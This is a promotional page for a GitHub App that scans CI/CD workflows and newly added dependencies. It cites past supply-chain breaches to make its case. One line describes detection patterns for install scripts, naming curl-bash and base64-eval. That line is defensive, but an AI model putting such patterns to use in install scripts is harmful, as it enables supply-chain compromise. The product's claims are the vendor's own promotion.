Find your CI/CD vulnerabilities in 5 seconds.

Your application code isn't where the breach will come from.

Every JavaScript repo has Dependabot enabled. Most have CodeQL. Senior engineers have probably bolted on Snyk or Semgrep too. And then, on March 14th, 2025, a maintainer's GitHub account got phished. The compromised version of tj-actions/changed-files ran on 23,000+ repositories overnight, dumped their workflow secrets to public logs, and Dependabot was silent the whole time.

Dependabot was silent because it scans your existing dependencies for known CVEs. The malicious version had no CVE.

CodeQL was silent because it scans your application code. The exploit was a workflow YAML file.

Snyk was silent for the same reason as Dependabot. So was npm audit. So was every commercial SCA tool on the market that bills you $25 per developer per month.

This is the new pattern.

Look at the last three years of high-profile supply-chain breaches:

• Shai-Hulud npm worm(Sep 2025) — 180+ packages including CrowdStrike's. Malicious postinstall scripts. No CVE at install time.
• tj-actions/changed-files (Mar 2025) — workflow action compromised. 23,000+ repos. Tag pinning instead of SHA pinning. No CVE at install time.
• Polyfill.io (Jun 2024) — domain sold, 100,000+ sites poisoned via CDN injection. No CVE at install time.
• xz-utils (Mar 2024) — multi-year maintainer takeover, SSH backdoor in release tarballs. No CVE at install time.
• ctx PyPI package (May 2022) — abandoned package taken over via expired email domain. AWS keys stolen from every install. No CVE at install time.

None of these were attacks on your code. They were attacks on the two layers between your code and production: the workflow files that run your CI/CD, and the packages you add via PR.

Those two layers are the most privileged and least audited surfaces in your repo. Your CI/CD has access to your deploy keys, your prod database passwords, your AWS account. Your package-lock.json gets a new entry every Wednesday and nobody reads the diff because npm packages have funny names.

So we built vu1nz.

One GitHub Action. Two scanners.

Scanner 1 reads your workflow files and runs 17 deterministic checks mapped to CWE — script injection, unpinned actions, secrets in run:, pull_request_target patterns, the full set of CI/CD anti-patterns that the OWASP CI/CD Top 10 names.

Scanner 2watches your PR diffs. When somebody adds a new npm / pip / cargo / gem / go.mod / composer package, we check it against OSV.dev's real-time malware feed, run it through a typosquat-distance check against the top 5k packages in each ecosystem, fingerprint its install scripts for shell-out / curl-bash / base64-eval patterns, and flag anything published in the last 7 days from a low-reputation maintainer.

Both are packaged as a GitHub App you install once on your org. Every PR triggers automatically — no workflow files to maintain, no secrets to rotate across repos. Results appear as a Check Run inline on the PR, and full scan history lives in your dashboard at vu1nz.com/dashboard.

Free 14-day trial per org, no card. After that, $100 per month per org — roughly one developer-hour, regardless of team size or repo count. Add your Anthropic key to the dashboard and every scan gets Claude AI code review on top of the deterministic checks.

We're not trying to replace Dependabot or CodeQL. Keep them. They're good at what they do. We catch what they don't — which is, increasingly, what actually breaches companies.

Try the scanner above on your own org. We'll find something. Then come install the action.